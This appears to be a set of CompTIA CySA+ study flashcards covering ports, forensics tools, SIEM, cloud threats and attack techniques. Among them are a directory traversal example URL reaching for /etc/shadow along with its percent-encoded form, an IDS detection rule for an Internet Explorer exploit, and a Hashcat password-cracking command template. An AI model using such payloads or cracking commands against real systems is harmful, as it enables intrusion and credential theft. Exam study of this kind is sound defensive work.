- capturing the contents of memory while the computer is running using a specialist hardware/software tool (e.g., Memoryze from FireEye and F-Response from TACTICAL) - generates a snapshot of data that is changing second-by-second
Act (with Example)
- carry out the decision and related changes that need to be made in response to the decision - (ex.) the user's system is isolated by an incident responder, who then begins to observe again for additional indicators
Hashcat
- a command-line tool used to perform brute force and dictionary attacks against password hashes - relies on GPUs (graphical processing units) instead of CPUs to perform brute force cracking more quickly
Responder
- a command-line tool used to poison responses to NetBIOS, LLMNR, and MDNS name resolution requests in an attempt to perform a MiTM attack - designed to intercept LLMNR and NBT-NS requests and return the attacker's host IP as the name record
Modbus (ICS/SCADA)
- a communications protocol used in operational technology (OT) networks - gives control servers and SCADA hosts the ability to query and change the configuration of each PLC
Decide (with Example)
- makes suggestions towards an action or response plan while taking into consideration all of the potential outcomes - (ex.) the user's system was compromised, malware was installed by the attacker, and we should isolate the system
data submitted via a URL is delimited by the ___ character (URL Analysis)
?
Cousin Domains
A DNS domain that looks similar to another name when rendered by a Mail User Agent (MUA)
What are 2 ways SQL Injection attacks can be prevented/mitigated?
*input validation* and using least privilege when accessing a database
Sysinternals
- A suite of tools designed to assist with troubleshooting issues with Windows, and many of the tools are suited to investigating security issues - Process Explorer (one of the tools) can filter out legitimate activity (known-good) to look for signs of anomalous behavior (comparing suspicious events to your baseline)
Software-Defined Networking (SDN) *
- APIs and compatible hardware allowing for programmable network appliances and systems (essentially taking our physical networks and virtualizing them) - allows for automatic deployment and disaster recovery 1. control plane (makes decisions about how traffic should be prioritized and secured, and where it should be switched) 2. data plane (handles the actual switching and routing of traffic and imposition of ACLs for security) 3. management plane (monitors traffic conditions and network status)
Improper Key Management (Cloud Threats)
- APIs should use secure authentication and authorization such as SAML or OAuth/OIDC before accessing data - delete unnecessary keys and regenerate new keys when moving into the production environment - ensure that hardening policies are in place for your servers and workstations (*WARNING: do NOT hardcode or embed a key into the source code*)
Port 53 (UDP)
- DNS - uses UDP for DNS queries
Port 53 (TCP)
- DNS (domain name system - translates our IPs to names and our names to IPs) - uses TCP for zone transfers
Observe (with Example)
- Identify the problem or threat and gain an overall understanding of the internal and external environment - (ex.) An alert in your SIEM has been created due to an employee clicking on a link in an email
Orient (with Example)
- Involves reflecting on what has been found during observations and considering what should be done next - (ex.) identify the user's permissions, any changes identified in the user's system, and potential goals of attacker
ps
- Linux command that lists the attributes of all current processes - this command shows only processes started by the current user by default - * ps -A or ps -e will provide a full list of all running processes for all users *
OWASP *
- Open Web Application Security Project's security framework for secure application development - a charity and community that publishes a number of secure application development resources
What is the difference between SOA and Microservices?
- SOA allows applications to be built from services with interdependencies - Microservices are capable of being developed, tested, and deployed independently (easily scalable without interdependencies)
NetFlow
- a Cisco-developed means of reporting network flow information to a structured database - doesn't show the full packet captures, so you will not have a complete record of what's happening
Golden Tickets
- a Kerberos ticket that can grant other tickets in an Active Directory environment - can grant administrative access to other domain members and domain controllers - allow attackers to laterally move across the entire domain with ease (*Important Note* administrators should change the krbtgt account password regularly)
AlienVault and OSSIM (Open-Source Security Information Management)
- a SIEM solution originally developed by AlienVault, now owned by AT&T, and rebranded as AT&T Cybersecurity - OSSIM can integrate other open-source tools, such as Snort IDS and OpenVAS vulnerability scanner, and provide an integrated web administrative tool to manage the whole security environment (all in one solution)
Maturity Model
- a component of an ESA (enterprise security architecture) framework that is used to assess the formality and optimization of security control selection and usage and address any gaps (5 levels) 1. Level 1 - Initial (highly reactive in nature) 2. Level 2 - Managed (prepare to mitigate through risk assessments) 3. Level 3 - Defined (defined policies and procedures) 4. Level 4 - Quantitatively Managed (management oversight of risks) 5. Level 5 - Optimizing (fully proactive risk-driven approach)
Hardware Root of Trust (ROT)
- a cryptographic module embedded within a computer system that can endorse trusted execution and attest to boot settings and metrics (e.g., TPM) - essentially used to scan the boot metrics and OS files to verify their signatures, and then used to sign the report (digital certificate embedded inside your processor or firmware)
Threat Hunting
- a cybersecurity technique designed to detect presence of threats that have not been discovered by normal security monitoring - steps to threat hunting: analyze network traffic, analyze the executable process list, analyze other infected hosts, identify how the malicious process was executed - threat hunting consumes a lot of resources and time to conduct but can yield a lot of benefits - benefits include: improve detection capabilities, integrate intelligence, reduce attack surface, block attack vectors, identify critical assets
EnCase (Forensic Tools)
- a digital forensics case management product created by Guidance Software with built-in pathways or workflow templates that show the key steps in many types of investigations (used for both data acquisition and analysis) - file format = .e01 - also supports .dd format (disk duplication file - industry standard)
The Forensic Toolkit (FTK)
- a digital forensics investigation suite by AccessData that runs on Windows Server or server clusters for faster searching and analysis due to data indexing when importing evidence - file format = .aff - also supports .dd format
Controller Area Network (CAN)
- a digital serial data communications network used within vehicles (airplanes, cars, trains) - the primary external interface is the Onboard Diagnostics (OBD-II) module
Web Application Firewall (WAF)
- a firewall designed specifically to protect software running on web servers and their backend databases from code injection and DoS attacks - used to prevent web-based exploits and vulnerabilities like SQL injection, XML injection, and cross-site scripting (XSS) attacks
Adversary Capability
- a formal classification of resources and expertise available to a threat actor
Prescriptive Framework
- a framework that stipulates control selection and deployment - driven by regulatory compliance
Network Access Control (NAC) *
- a general term for the collected protocols, policies, and hardware that authenticate and authorize access to a network at the device level (best option of the 3) - provides the means to authenticate users and evaluate device integrity BEFORE a network connection is permitted - relies on 802.1X
Zeek (Bro)
- a hybrid tool that passively monitors a network like a sniffer and only logs data of potential interest - essentially, it samples the data just like NetFlow does, but when it finds something interesting it logs the entire thing - this helps reduce our storage and processing requirements and gives us the ability to have all this data in one single format - performs normalization of the data using JSON
Application Programming Interface (API)
- a library of programming utilities used to enable software developers to access functions of another application - allows for the automated administration, management, and monitoring of a cloud service and applications (commonly use REST or SOAP as their frameworks)
HTTP Access Logs
- a log containing HTTP traffic that encountered an error or traffic that matches some pre-defined rule set - relevant information is recorded in the common log format (CLF) or W3C extended log file format - status codes of responses indicate if an error was caused by the client or server
Cross-Site Scripting (XSS)
- a malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones - breaks the browser's security model since browsers assume scripting is safe (*XSS is a powerful input validation exploit*)
Beaconing
- a means for a network node to advertise its presence and establish a link with other nodes (gives an attacker the ability to establish a C2 server to communicate with malware on the infected host) - malicious beaconing usually takes the form of a simple ping or heartbeat to verify the bot is still alive in the botnet (can happen at regular intervals or different times) - beaconing can be used legitimately, such as a beacon management frame being sent by a wireless access point for normal network communications (NTP servers, auto update and patching systems, cluster services) (*Exam Tip: traditional beaconing occurs in regular intervals, such as every 5 seconds, every 15 minutes, every day, etc.)
Black Hole *
- a means of mitigating DoS or intrusion attacks by silently dropping (discarding) traffic - more effective than using an ACL and a firewall - can be done at the firewall level (requires more processing power) or router level (more efficient method)
Percent Encoding
- a mechanism to encode 8-bit characters that have specific meaning in the context of URLs, also known as URL encoding - whenever you see percent encoding typically something is hidden there and further investigation is needed
DNS Zone Transfer
- a method of replicating DNS databases across a set of DNS servers that is often used during the reconnaissance phase of an attack - a zone transfer can be used to collect DNS information about your servers and give it to an attacker to plan further attacks
Heuristic Analysis
- a method that uses feature comparisons and likenesses rather than specific signature matching to identify whether the target of observation is malicious - uses machine learning to alert on behavior that is similar enough to a signature or rule
Trusted Foundry
- a microprocessor manufacturing utility that is part of a validated supply chain (one where hardware and software do not deviate from their documented function) - created and operated by the DoD
Pass the Hash
- a network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on - it is possible to present the hash without cracking the original password to authenticate to network protocols such as SMB and Kerberos - commonly used to elevate privileges (when pass the hash is used on a local workstation, an attacker can gain local admin privileges) - (*Important Note* domain administrative accounts should ONLY be used to log on to domain controllers to prevent pass the hash from exploiting your domain)
Packet Sniffer
- a piece of hardware or software that records data from frames as they pass over a network media using methods such as a mirrored port or tap device - make sure a network sniffer is placed inside a firewall or close to an important server - you can deploy multiple sniffers within your network - tcpdump and Wireshark
Staging Areas (Disk and File System)
- a place where an adversary begins to collect data in preparation for data exfiltration, such as temporary files and folders, user profile locations, data masked as logs, alternate data streams (ADS), or in the recycle bin - data is often compressed and encrypted in the staging area (IOC#1)
Malicious Process
- a process executed without proper authorization from the system owner for the purpose of damaging or compromising the system - malware code will often be injected into a host process by making it load the malware code as a dynamic link library (DLL) within Windows - malware often uses injection into Linux shared libraries (Shared Objects or .so files)
Federation
- a process that provides a shared login capability across multiple systems and enterprises - allows the company to trust accounts created and managed by a different network
System-on-Chip (SoC) (Embedded System)
- a processor that integrates the platform functionality of multiple logical controllers onto a single chip (combines multiple PLCs into one chip) - power efficient and used with embedded systems
Burp Suite
- a proprietary interception proxy and web application assessment tool - allows for the automated scanning of vulnerabilities and crawling of an application to discover content, while providing tools for automating the modification of requests and insertion of exploits
Syslog (Mac or Linux)
- a protocol enabling different appliances and software applications to transmit logs or event records to a central server - follows a client-server model and is the de facto standard for logging of events from distributed systems across the network - syslog can refer to the protocol, the server, or the log entries themselves - runs on port 514 (UDP) over TCP/IP
NIST Cybersecurity Framework
- a risk-based framework that is focused on IT security over IT service provision - covers three main areas: framework core, implementation tiers and framework profiles
HTTP Method (URL Analysis)
- a set of request methods to indicate the desired action to be performed for a given resource - a request contains a method, a resource, a version number, the header, and the body of the request
Conditional Analysis
- a simple form of correlation performed by a machine by using signature detection and rules-based policies (IF x AND y OR z) - drawback is this type of analysis creates large numbers of false positives and cannot find zero-day or new TTPs
Endpoint Protection Platform (EPP) (endpoint protection tool)
- a software agent and monitoring system that performs multiple security tasks such as anti-virus, HIDS/HIPS, firewall, DLP, and file encryption - focused on signature-based detection
Endpoint Detection and Response (EDR)
- a software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats - focused on behavioral and anomaly analysis
Data Loss Prevention (DLP)
- a software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks (made up of 3 components) 1. policy server (used to configure classification, confidentiality and privacy rule sets, logging + reporting) 2. endpoint agents (used to enforce policy on client computers) 3. network agents (scans network activity and protects things from leaving your network)
Heap Overflow
- a software vulnerability where input is allowed to overwrite memory locations within the area of a process's memory allocation used to store dynamically-sized variables - can overwrite those variables and possibly allow arbitrary code execution
SIEM
- a solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications (detection and monitoring capabilities) - helps us correlate events
Attack Vector
- a specific path by which a threat actor gains unauthorized access to a system - 3 main areas to consider: cyber, human, physical
Trusted Platform Module (TPM)
- a specification for hardware-based storage of digital certificates, keys, hashed passwords, and other user and platform identification information - part of your system that gives you the ability to ensure that when you're booting up, it is done securely, and we can take those reports and digitally sign them
STIX (Structured Threat Information eXpression - Indicator Management) *
- a standard terminology for IoCs and ways of indicating relationships between them that is included as part of the OASIS Cyber Threat Intelligence (CTI) framework - JSON format (attributes and values) - STIX is built from high-level STIX domain objects (SDOs) that contain multiple attributes and values
Aircrack-ng Suite (Wireless Assessment Tools)
- a suite of utilities designed for wireless network security testing (4 tools inside of it) 1. airmon-ng 2. airodump-ng 3. aireplay-ng 4. aircrack-ng
User and Entity Behavior Analytics (UEBA) *
- a system that can provide automated identification of suspicious activity by user accounts and computer hosts - starts with a good baseline and then compares anything that goes outside that baseline as something suspicious - UEBA solutions are heavily dependent on advanced computing techniques like artificial intelligence (AI) and machine learning (heavily focuses on analytics)
URL Analysis
- activity that is performed to identify whether a link is already flagged on an existing reputation list, and if not, to identify what malicious script or activity might be coded within it - need to use the right tools to be able to: resolve percent encoding, assess redirection of the URL, show source code for scripts in the URL - all of this needs to be performed in a sandbox environment so you don't infect your own machine
How do you mitigate false positives when performing a vulnerability scan?
- adjust scans to a more appropriate scope - create a new baseline for a heuristic scan - add application to exception list - vulnerability exists but isn't exploitable
SPAN (Switched Port Analyzer)
- allows for the copying of ingress and/or egress communications from one or more switch ports to another (essentially it makes a copy of everything coming in or out of a port and then puts that on a duplicate port so you can then monitor it) - once you have a SPAN port configured you need to enable packet sniffing
aircrack-ng
- allows us to extract the authentication key and try to retrieve the plain text version of your password for that network - effective against all WEP-based networks - RADIUS authentication is an effective mitigation against aircrack-ng
aireplay-ng
- allows us to inject frames to perform attacks to obtain authentication credentials for an access point - this works by deauthenticating the victim from the access point and then capturing the reauthentication when the victim tries to reconnect to it
Simple Object Access Protocol (SOAP)
- an XML-based web services protocol that is used to exchange messages - supports authentication, transport security, asynchronous messaging, and built-in error handling (leverage Web Services Security, WS-Security, extensions to enforce integrity and confidentiality via SOAP) (web services using SOAP may be vulnerable to different exploits such as probing, coercive parsing, external references, malware, SQL injection)
Directory Traversal
- an application injection attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory - may be used to access any file on a system with the right permissions (e.g., http://diontraining.com/../../../../etc/shadow) (Unix systems use ../ but Windows systems use ..\) (*WARNING: attackers may use encoding to hide directory traversal attempts, for example, %2e%2e%2f represents ../)
Document Object Model (DOM) XSS
- an attack that exploits the client's web browser using *client-side* scripts to modify the content and layout of a webpage - runs with the logged in user's privileges of the local system
Reverse Shell
- an attacker opens a listening port on the remote host and causes the infected host to connect to it - is used to exploit organizations that have not configured outbound traffic filtering at the firewall - attackers use Netcat (nc) to perform these actions
Secure Multipurpose Internet Mail Extensions (S/MIME)
- an email encryption standard that adds digital signatures and public key cryptography to traditional MIME communications - in order for this to work, a user must be issued a digital certificate containing his or her public key before they can use S/MIME
Active Scan (Vulnerability Scanner Types)
- an enumeration or vulnerability scan that analyzes the responses from probes sent to a target (consumes network bandwidth and processor resources) - can be configured as a credentialed, non-credentialed, server-based, or agent-based scan
Vulnerability Assessment
- an evaluation of a system's security and ability to meet compliance requirements based on the configuration state of the system as represented by information collected from the system (3 main steps) 1. collect a set of target attributes 2. analyze the differences in the current and baseline configurations 3. report the results
Factors Indicating a DDoS Attack
- an excessive number of TIME_WAIT connections in a load balancer's or web server's state table - high numbers of HTTP 503 Service Unavailable log events - if you see a large amount of outbound traffic from your network, it could indicate your network contains victimized hosts being used in a DDoS against other people - IOCs with a DDoS attack include bandwidth consumption and traffic spikes (*but these can be indicators for other types of attacks too)
Mimikatz
- an open-source application that allows users to view and save authentication credentials in order to perform pass the hash attacks - scans system memory for cached passwords processed by the Local Security Authority Subsystem Service (lsass.exe)
hping
- an open-source spoofing tool that provides a pentester with the ability to craft network packets to exploit vulnerable firewalls and IDS/IPS - host/port detection and firewall testing - timestamping - traceroute - fragmentation - DoS
What is the difference between Behavioral Analysis and Anomaly Analysis?
- anomaly analysis uses prescribed patterns (like an RFC or industry standard), whereas behavioral analysis records expected patterns in relation to the device being monitored - in other words, with anomaly analysis we are looking at everything following a standard - with behavioral analysis we are making up our own standard based on the observed patterns on that device
Input Validation
- any technique used to ensure that the data entered into a field or variable in an application is handled appropriately by that application - can be conducted locally (on client) or remotely (on server) (*WARNING: client-side input validation is more dangerous since it is vulnerable to malware interference) (server-side input validation can be time and resource intensive) (useful against XML, SQL, Directory Traversal, XSS injection attacks)
Irregular Peer-to-Peer (P2P) Communication
- attack indicator where hosts within a network establish connections over unauthorized ports or data transfers - attackers commonly use Server Message Block (SMB) since it is typical within Windows File/Printer sharing environments
How can you mitigate a DGA?
- best mitigation is to use a Secure Recursive DNS Resolver - recursive resolution is when one trusted DNS server communicates with several other trusted DNS servers to hunt down an IP address and returns it to the client
Unprotected Storage (Cloud Threats)
- cloud storage containers are referred to as buckets (AWS) or blobs (Azure) - incorrect permissions may occur due to default read/write permissions leftover from creation - incorrect origin settings may occur when using content delivery networks (CORS policy) (*WARNING: Access control to storage is administered through container policies, IAM authorizations, and object ACLs)
ELK/Elastic Stack
- collection of free and open-source SIEM tools that provides storage, search and analysis functions - made up of 4 different components: Elasticsearch (query/analytics), Logstash (log collection/normalization), Kibana (visualization), Beats (endpoint collection agents)
Covert Channels
- communication path that allows data to be sent outside of the network without alerting any intrusion detection or data loss countermeasures - covert channels enable the stealthy transmission of data from node to node using means that your security controls do not anticipate
Physical Access Control System (PACS)
- components and protocols that facilitate the centralized configuration and monitoring of security mechanisms within offices and data centers - can either be implemented as part of a building automation system (BAS) or a separate system (*WARNING: PACS are often installed and maintained by an external supplier and are therefore omitted from risk and vulnerability assessments by analysts)
Bus Encryption
- data is encrypted by an application prior to being placed on the data bus - ensures that the device at the end of the bus is trusted to decrypt the data
Features of MDM/EMM systems
- device enrollment and authentication (asset tracking) - remote lock and remote wipe - identifying device locations - patch and update deployments - preventing root/jailbreaks - create encrypted containers for data - restricting features/services of applications - can be used to manage incidents and conduct investigations
Code Injection
- exploit technique that runs malicious code with the identification number of a legitimate process - techniques include: masquerading (where your dropper is going to replace a genuine executable with a malicious one), DLL injection (where the dropper forces a legitimate process to load a malicious DLL), DLL sideloading (where the dropper is going to exploit a vulnerability in a legitimate program's manifest to load a malicious DLL at runtime), and process hollowing (this is when a dropper starts a process in a suspended state and then rewrites the memory locations containing the process code with the malware code)
Living Off the Land *
- exploit techniques that use standard system tools and packages to perform intrusions - detection of an adversary is more difficult when they are executing malware code within standard tools and processes
SIEM Queries
- extracts records from among all the data stored for review or to show as visualization - uses Select (some fields), Where (some set of conditions), Sorted By (some fields)
What are 2 anti-tamper mechanisms to protect your systems?
- field programmable gate array (FPGA) - physically unclonable function (PUF)
How are SMTP logs typically formatted and what will we typically see in these types of logs?
- formatted in request/response fashion - see things like time of request/response, address of recipient, size of message and status code
Fingerprinting *
- identifying the type and version of an operating system (or server application) by analyzing its responses to network scans (targeting one machine) - tools that perform host system detection to map out open ports, OS type and version, file shares, running services and applications, system uptime, and other useful metadata
Patch Management
- identifying, testing, and deploying OS and application updates (fixing security bugs) - classified as critical, security-critical, recommended, and optional
How can you detect a DGA/Fast Flux Network?
- if you start seeing a lot of call-outs from your systems to random domain names that look like this (A1ZWBR93.com, 94ZGYS9.com, etc) - if you get a high rate of NXDOMAIN errors when resolving the DNS
Sensitive Personal Information (SPI)
- information about a subject's opinions, beliefs, and nature that is afforded specially protected status by privacy legislation - the GDPR definition of SPI includes religious beliefs, political opinions, trade union membership, gender, sexual orientation, racial or ethnic origin, genetic data, and health information
How can we mitigate/prevent Buffer Overflow attacks?
- input validation - ASLR - run programs with least privilege
What are the 4 major threats facing the Cloud?
- insecure API - improper key management - insufficient logging and monitoring - unprotected storage
Certificate Management includes
- installing, updating, and validating trusted root certificates - deploying, updating, and revoking subject certificates - preventing the use of self-signed certificates - SSH key management (cryptographic key pairs)
Benefits of DevSecOps
- integrate security from the beginning - test during and after development - automate compliance checks
Open-Source Intelligence (OSINT)
- publicly available information plus the tools used to aggregate and search it - sources: publicly available information, social media, HTML code, metadata
Firewalking
- reconnaissance technique to enumerate firewall configuration and attempt to probe hosts behind it - occurs when an attacker can find an open port on the firewall, then sends a packet with a TTL of one past the firewall to find its hosts
Port Security
- refers to the blocking of unauthorized application service ports on hosts and firewalls, or the physical and remote access ports used to allow a host to communicate on the local network - recommendations: disable web administrative interfaces and use SSH shells instead for increased security
How do you mitigate false negatives when performing a vulnerability scan?
- run repeated scans - use different scan types (or different scanner) - use different sensitivities
Benefits of a SOAR
- scans security/threat data - analyze it with ML (machine learning) - automate data enrichment process - provision new resources (incident response)
Common Platform Enumeration (CPE)
- scheme for identifying hardware devices, operating systems, and applications by MITRE corporation - database of different fingerprint signatures (this is how nmap is able to run fingerprint scans)
Nmap Scripting Engine (NSE)
- scripts are written in the Lua scripting language that can be used to carry out detailed probes - includes: OS detection and platform enumeration, Windows user account discovery, identify logged-on Windows user, basic vulnerability detection, get HTTP data and identify applications, and geolocation to traceroute probes
What are some benefits to using a CASB?
- single sign-on - malware and rogue device detection - monitor/audit user activity - mitigate data exfiltration
Premise Systems
- systems used for building automation and physical access security - many system designs allow the monitoring to be accessible from the corporate data network or even directly from the Internet
Persistence *
- the ability of a threat actor to maintain covert access to a target host or network - usually relies on modifying the Registry or a system's scheduled tasks
Secure Enclave
- the extensions allow a trusted process to create an encrypted container for sensitive data (helps prevent buffer overflow attacks) - store encryption keys and other sensitive data
File Signature (or Magic Number)
- the first two bytes of a binary header that indicate its file type - a Windows portable executable file will always start with 4D 5A in HEX, MZ in ASCII, or TV in Base64 encoding
Attack Surface
- the points at which a network or application receives external connections or inputs/outputs that are potential vectors to be exploited by a threat actor - 3 main areas to consider: the holistic network, websites or cloud-services, custom software applications
File Carving
- the process of extracting data from a computer when that data has no associated file system metadata - attempts to piece together data fragments from unallocated and slack space to reconstruct deleted files or at least parts of those files
Digital Forensics
- the process of gathering and submitting computer evidence to trial and interpreting that evidence by providing expert analysis - uses specialist tools and skills to recover information from computer systems, memory and storage
Threat Modeling
- the process of identifying and assessing the possible threat actors and attack vectors that pose a risk to the security of an app, network or other system - 3 main areas to consider: Adversary Capability, Attack Surface, Attack Vector
Data enrichment
- the process of incorporating new updates and information to an organization's existing database to improve accuracy - when data enrichment is occurring, it could combine a threat intelligence feed with a log of NetFlow. This will allow an analyst to know if an IP address of interest is actually associated with a known APT (AI-based systems combine indicators from multiple threat feeds to reduce false positives and false negatives) (AI-based systems can identify obfuscated malware better than their human counterparts)
System Hardening *
- the process of securing a system's configuration and settings to reduce IT vulnerability and the possibility of being compromised (one of the most effective preventative measures when designing the system's security) - includes deactivating unnecessary components (ports, processes, applications, etc), disabling unused user accounts (guest, ex-employee), implementing patch management, restricting host access to peripherals (USB, Bluetooth) and restricting shell commands
Software Development Life Cycle (SDLC)
- the processes of planning, analysis, design, implementation, and maintenance that governs software and systems development - it is important to integrate security controls into each stage of the SDLC - Waterfall and Agile methods
System Assessments
- the systematic identification of critical systems by compiling an inventory of the business processes and the tangible and intangible assets and resources that support those processes - conducted to better posture an organization to reduce risk and prevent losses - consider the people, tangible assets, intangible assets and procedures
Pivoting
- the use of one infected computer to attack a different computer - uses the compromised system to attack other systems on the same network to avoid restrictions such as firewall configurations
When using tcpdump, which option or flag would you use to record the ethernet frames during a packet capture?
-e
While performing a vulnerability scan, Christina discovered an administrative interface to a storage system is exposed to the internet. She looks through the firewall logs and attempts to determine whether any access attempts have occurred from external sources. Which of the following IP addresses in the firewall logs would indicate a connection attempt from an external source?
192.186.1.100
- r-- --- --- filename
400
- rw- r-- r-- filename
644
- rwx r-x --- filename
750
- rwx rwx rwx filename
777
A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company's security controls. Which DNS assessment technique would be classified as active?
A zone transfer
Egress Filtering
ACL rules that are applied to traffic leaving a network to prevent malware from communicating to C2 (Command and Control) servers
SLE (single loss expectancy) x ARO (annual rate of occurrence) =
ALE (annual loss expectancy)
________ and ________ are part of Sysinternals and can analyze privileges applied to a file or resource
AccessChk, AccessEnum
You are reviewing a rule within your organization's IDS. You see the following output: alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt"; flow:to_client,established; file_data; content:"recordset"; offset:14; depth:9; content:".CacheSize"; distance:0; within:100; pcre:"/CacheSize\s*=\s*/"; byte_test:10,>,0x3ffffffe,0,relative,string; max-detect-ips drop, service http; reference:cve,2016-8077; classtype:attempted-user; sid:65535; rev:1;)
An inbound malicious TCP packet
You have been asked to review the SIEM event logs for suspected APT activity. You have been given several indicators of compromise, such as a list of domain names and IP addresses. What is the BEST action to take in order to analyze the suspected APT activity?
Analyze the trends of events while manually reviewing them to see if any indicators match
Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect when an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?
Behavior
Which programming languages are extremely vulnerable to buffer overflow attacks? *
C/C++ (strcpy in C/C++ does not perform boundary checking of buffers)
Vehicles connect numerous subsystems over a ______
CAN (controller area network)
You are conducting a forensic analysis of a hard disk and need to access a file that appears to have been deleted. Upon analysis, you have determined that data fragments from the file exist scattered across the unallocated and slack space of the drive. Which technique could you use to recover the data?
Carving
How do you use Hashcat?
hashcat -m <HashType> -a <AttackMode> -o <OutputFile> <InputHashFile>
Port 68 (UDP)
DHCP (client port for DHCP)
Port 67 (UDP)
DHCP (server port for DHCP)
During the analysis of data as part of ongoing security monitoring activities, which of the following is NOT a good source of information to validate the results of an analyst's vulnerability scans of the network's domain controllers?
DMARC and DKIM
_____ is an effective command and control channel since it doesn't need a direct connection to the outside network and instead can use a local DNS resolver
DNS
Sender Policy Framework (SPF)
DNS record identifying hosts authorized to send mail for the domain with only one being allowed per domain (e.g., TXT @ v=spf1 mx include:_spf.google.com include:email.freshdesk.com -all)
How do you create a rule to send an alert if multiple user log-on failures occur within one hour from a single account?
Error.LogonFailure > 3 AND LogonFailure.User AND Duration < 1 hour
Port 21 (TCP)
FTP (file transfer protocol)
Port 80 (TCP)
HTTP (HyperText Transfer Protocol)
Port 8080 (TCP)
HTTP-PROXY (HTTP proxy service or alternate port for HTTP)
Port 443 (TCP)
HTTPS
Port 143 (TCP)
IMAP (internet mail access protocol)
Port 993 (TCP)
IMAPS (over SSL/TLS)
How do you know if it's legitimate DNS traffic or an IOC?
IOC #1: same query is repeated several times when a bot is checking into a control server for more orders (normal DNS queries happen once) IOC #2: commands sent within request or response queries will be longer and more complicated than normal
Port 631 (UDP port)
IPP (internet printing protocol)
Data in transit is protected by transport encryption protocols like
IPsec (using VPNs), TLS (connecting over the web), or WPA2 (local area network)
Port 500 (UDP port)
ISAKMP (internet security association and key management protocol that is used to set up IPsec tunnels)
Response Code 500 (URL Analysis)
Indicates a general error on the server-side of the application
You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first?
L3 cache (cache memory)
Security Development Life Cycle (SDL)
Microsoft's security framework for application development that supports dynamic development processes (agile method)
Port 123 (UDP)
NTP (network time protocol)
Port 138 (UDP)
NetBIOS-DGM (NetBIOS datagram service supports Windows File Sharing with pre-Windows 2000 version hosts)
Port 137 (UDP)
NetBIOS-NS (NetBIOS name service supports Windows File Sharing with pre-Windows 2000 version hosts)
Port 139 (UDP)
NetBIOS-SSN
Port 139 (TCP)
NetBIOS-SSN (NetBIOS session service supports Windows File Sharing with pre-Windows 2000 version hosts) (Windows only)
Email Harvesting
OSINT techniques used to gather email addresses for a domain
While studying for your CompTIA CySA+ course at Dion Training, you decided you want to install a SIEM to collect data on your home network and its systems. You do not want to spend any money purchasing a license, so you decide to use an open-source option instead. Which of the following SIEM solutions utilize an open-source licensing model?
OSSIM
OODA Loop (Don't Need to Know for Exam but for the Real World)
Observe, Orient, Decide, Act (continuous loop)
Shimcache
an application usage cache that is stored in the Registry as the key (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache)
To prevent directory traversals and file inclusion attacks, use proper __________
input validation
Port 110 (TCP)
POP3 (post office protocol is a legacy mailbox access protocol)
Port 995 (TCP)
POP3S (over SSL/TLS)
Port 1723 (TCP)
PPTP (point-to-point tunneling protocol is a legacy VPN protocol with weak security implementation)
Port 3389 (TCP)
RDP (remote desktop protocol) (Windows only)
Port 520 (UDP port)
RIP (routing information protocol)
Port 111 (TCP)
RPCBIND (maps remote procedure call (RPC) services to port numbers in a UNIX-like environment) (Unix, Linux, MacOS only)
A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?
Returns all webpages containing an email address affiliated with diontraining.com
Windows has two types of autorun keys: (keys attackers use to gain persistence)
Run, RunOnce
AV (asset value) x EF (exposure factor/probability) =
SLE (single loss expectancy)
Port 25 (TCP)
SMTP (simple mail transfer protocol)
Port 161 (UDP)
SNMP (agent port for SNMP)
Port 162 (UDP)
SNMP (management station port for receiving SNMP trap messages)
Port 22 (TCP)
SSH/SFTP (Secure File Transfer Protocol)
You are conducting an investigation on a suspected compromise. You have noticed several files that you don't recognize. How can you quickly and effectively check if the files have been infected with malware?
Submit the files to an open-source intelligence provider like VirusTotal
Port 514 (UDP port)
Syslog (server port for a syslog daemon)
Attackers now use domain generation algorithms to overcome blacklists (T/F)
T
Port 69 (UDP)
TFTP (trivial file transfer protocol)
You just received a notification that your company's email servers have been blacklisted due to reports of spam originating from your domain. What information do you need to start investigating the source of the spam emails?
The full email header from one of the spam messages
Posture Assessment
The process of assessing the endpoint for compliance with the health policy (health policy refers to a list of things that we're going to check for that device and see if it has and meets certain standards/requirements)
Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices?
User and Entity Behavior Analytics (UEBA)
Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system?
Whitelisting
icacls
Windows command-line tool for showing and modifying file permissions (N - no access, F - full access, R - read only, RX - read and execute, M - modify, W - write, D - delete)
Local Users and Groups (new accounts)
Windows tool that is used for the management of local accounts on a system
Legal Hold (Forensic Procedures)
a process designed to preserve all relevant information when litigation (lawsuit) is reasonably expected to occur
System Memory Image Acquisition
a process that creates an image file of the system memory that can be analyzed to identify the processes that are running, the contents of temporary file systems, Registry data, network connections, cryptographic keys and more
Disk Image Acquisition
a process that creates an image file of the system's disks that can be analyzed to identify current, deleted, and hidden files on a given disk (hard drive, solid state drive, USB thumb drive, etc)
Field Programmable Gate Array (FPGA)
a processor that can be programmed to perform a specific function by a customer rather than at the time of manufacture
Idempotence
a property of IaC that an automation or orchestration action always produces the same result, regardless of the component's previous state
Trusted Automated eXchange of Indicator Information (TAXII - Indicator Management)
a protocol for supplying codified information to automate incident detection and analysis
Infrastructure as Code (IaC)
a provisioning architecture in which deployment of resources is performed by scripted automation and orchestration (allows for the use of scripted approaches to provisioning infrastructure in the cloud, making it more secure) (robust orchestration can lower overall IT costs, speed up deployments, and increase security) (uses carefully developed and tested scripts and orchestration runbooks to generate consistent builds)
whois
a public listing of all registered domains and their registered administrators
